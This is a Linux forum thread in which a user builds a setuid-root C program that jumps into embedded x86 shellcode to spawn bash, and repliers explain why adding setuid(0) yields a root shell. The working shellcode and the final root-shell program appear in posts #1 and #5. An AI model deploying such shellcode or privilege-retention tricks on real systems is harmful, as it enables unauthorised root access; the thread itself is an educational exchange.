LinuxQuestions.org
Old 02-20-2013, 07:14 AM   #1
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Rep: Reputation: 0
Error in Shell prompt


I have made a script in C which spawns a shell. Here it is:

Code:
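#include <stdio.h>

/* Machine code that execs /bin/bash via int 0x80 (32-bit x86) */
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

int main(void)
{
	int *ret;

	/* Point ret at main's saved return address on the stack */
	ret = (int *)&ret + 2;

	/* Overwrite it so that returning from main jumps into shellcode */
	(*ret) = (int)shellcode;
}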
I have made it as root & set it as suid by

Code:
chmod +s mycode
Now I have copied this file to a normal user's location and executed it as a normal user. So I expected a root shell for the normal user, but I got the bash shell as a normal user.

I don't understand why I am not getting a root shell.

According to the definition of SUID, it is
Quote:
If the SUID bit is set for any application then your user ID would be set as that of the owner of application/file rather than the current user, while running that application.
So what am I doing wrong?

My OS info
Code:
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
Thanks
 
Old 02-20-2013, 09:49 AM   #2
NevemTeve
Senior Member
 
Registered: Oct 2011
Location: Budapest
Distribution: Debian/GNU/Linux, AIX
Posts: 1,779

Rep: Reputation: 495
Please try to avoid using machine code instead of proper C source. It has no advantage, except to make you look stupid.
 
Old 02-20-2013, 10:18 AM   #3
linosaurusroot
Member
 
Registered: Oct 2012
Distribution: OpenSuSE,RHEL,Fedora,OpenBSD
Posts: 778
Blog Entries: 2

Rep: Reputation: 199
I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.
 
1 members found this post helpful.
Old 02-20-2013, 11:37 PM   #4
chrism01
Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.5, Centos 5.10
Posts: 16,269

Rep: Reputation: 2028
1. suid is not honoured by the kernel for 'scripts', i.e. non-compiled languages, e.g. shell, Perl, Python etc.
eg http://www.techrepublic.com/blog/ope...d-to-know/3785

2. As above: 'Obviously we're expecting you not to run these on any systems you don't own.'
 
1 members found this post helpful.
Old 02-21-2013, 06:00 AM   #5
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by linosaurusroot
I expect bash is starting with ruid of the user but euid of root and in response to this it sets euid=ruid.

setuid(0) in the program before it does the implicit return might get you what you want. In a more realistic/useful setting you'd have a shellcode that starts with setuid(0) to deal with this.

Or you could run an interpreter such as perl instead of bash, set the uid in perl and finally exec bash.

Obviously we're expecting you not to run these on any systems you don't own.
Thanks linosaurusroot, it worked.
I got root from your solution.
Here is the final code which worked:
Code:
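#include <stdio.h>
#include <unistd.h>	/* setuid() */

/* Machine code that execs /bin/bash via int 0x80 (32-bit x86) */
char shellcode[] = "\xeb\x18\x5e\x31\xc0\x88\x46\x09\x89\x76\x0a\x89\x46\x0e\xb0\x0b\x89\xf3\x8d\x4e\x0a\x8d\x56\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43\x43";

int main(void)
{
	int *ret;

	/* Point ret at main's saved return address on the stack */
	ret = (int *)&ret + 2;
	/* With euid 0 this also sets the real uid to 0 */
	setuid(0);
	/* Overwrite the return address so main returns into shellcode */
	(*ret) = (int)shellcode;
}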
Can you explain to me what setuid(0) does here?
What is its use?

Thanks
 
Old 02-21-2013, 06:15 AM   #6
linosaurusroot
Member
 
Registered: Oct 2012
Distribution: OpenSuSE,RHEL,Fedora,OpenBSD
Posts: 778
Blog Entries: 2

Rep: Reputation: 199
Quote:
Originally Posted by Arjun
Can you explain to me what setuid(0) does here?
At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account, calling setuid(0) will set ruid=0. After that, both ruid and euid will be the same, so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
In fact, it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.

Last edited by linosaurusroot; 02-21-2013 at 06:16 AM.
 
1 members found this post helpful.
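The uid transitions described in posts #3 and #6, as an added example that is not part of the original thread. It is a simplified model that makes no real system calls: `struct creds`, `model_setuid`, `exec_suid_root` and `shell_euid_after_start` are hypothetical names, uid 1000 is a constructed sample value, and "privileged" is reduced to euid == 0. The last case shows the defensive counterpart: a setuid-root program that calls setuid() with its real uid gives up root for good.

```c
#include <stdio.h>

/* Constructed model of a process's user IDs; no real syscalls are made. */
struct creds { int ruid, euid, suid; };

/* Simplified Linux setuid(2) rules: a process with euid 0 sets all three
 * IDs; an unprivileged one may only set euid to its ruid or saved uid. */
int model_setuid(struct creds *c, int uid) {
    if (c->euid == 0) {
        c->ruid = c->euid = c->suid = uid;
        return 0;
    }
    if (uid == c->ruid || uid == c->suid) {
        c->euid = uid;
        return 0;
    }
    return -1; /* stands in for EPERM */
}

/* Credentials right after exec of a root-owned setuid binary:
 * real uid stays the caller's, effective and saved uid become 0. */
struct creds exec_suid_root(int caller_uid) {
    struct creds c = { caller_uid, 0, 0 };
    return c;
}

/* Assumed shell start-up behaviour (as described in post #3): when
 * euid != ruid, the shell falls back to the real uid. */
int shell_euid_after_start(struct creds c) {
    if (c.euid != c.ruid)
        model_setuid(&c, c.ruid);
    return c.euid;
}

int main(void) {
    struct creds a = exec_suid_root(1000);   /* first program in the thread */
    printf("no setuid(0): shell euid=%d\n", shell_euid_after_start(a));

    struct creds b = exec_suid_root(1000);   /* second program in the thread */
    model_setuid(&b, 0);
    printf("setuid(0):    shell euid=%d\n", shell_euid_after_start(b));

    struct creds d = exec_suid_root(1000);   /* hardened: permanent drop */
    model_setuid(&d, d.ruid);
    printf("after drop:   regain root rc=%d\n", model_setuid(&d, 0));
    return 0;
}
```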
Old 02-21-2013, 06:22 AM   #7
Arjun
Member
 
Registered: Feb 2011
Posts: 117
Blog Entries: 2

Original Poster
Rep: Reputation: 0
Quote:
Originally Posted by linosaurusroot
At a time when your process has euid=0 (meaning root) and ruid=50000 or whatever for your account, calling setuid(0) will set ruid=0. After that, both ruid and euid will be the same, so when bash starts it won't change euid back to 50000.

Much more detail at http://www.cs.berkeley.edu/~daw/pape...d-usenix02.pdf
In fact, it's good to have a look regularly at http://www.cs.berkeley.edu/~daw/papers/ where DAW posts educational stuff.
Thanks for the explanation. Got it now.
 
  

